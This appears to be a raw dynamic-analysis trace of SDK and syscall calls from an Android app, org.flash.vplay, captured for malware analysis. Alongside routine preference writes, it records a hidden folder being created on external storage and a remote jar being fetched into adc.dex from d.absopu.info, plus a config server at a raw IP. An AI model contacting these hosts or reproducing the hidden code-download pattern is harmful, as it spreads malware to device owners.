D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][Server] [Value][http://114.215.187.159/deamon/index.php/SdkConfig/switchCp]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MsgPushDefinition.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][UserAgent] [Value][galaxys5_android]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/MsgPushDefinition.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][com.player.video.msgpush.implbyself.show_player,
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.net.conn.CONNECTIVITY_CHANGE,
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][root] [Return][false]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/.xxx/]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/.xxx]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/storage/sdcard0/.xxx]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/storage/sdcard0/.xxx]
D/S4URC   ( 2475): [NDK] [SYSCALL] [mkdir] [PATH][string] [/storage/sdcard0/.xxx] [MODE][int] [0700]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [SDK] [java.io.File] [createNewFile] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/.xxx/adc.dex] [RETURN][int] [-1]
D/S4URC   ( 2475): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://d.absopu.info:8981/static/d/test0518.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/.xxx/adc.dex]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/.xxx/adc.dex] [RETURN][int] [-1]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/cache/com.android.opengl.shaders_cache]
D/S4URC   ( 2475): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://hmma.baidu.com/app.gif]
D/S4URC   ( 2475): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/__local_stat_cache.json]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/files/__local_stat_cache.json] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files/__local_stat_cache.json]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/files/__local_stat_cache.json] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][lastsendtime] [Value][1535038354010]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [NEW_PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [RETURN][int] [77]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [MODE][int] [0660]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][commit]
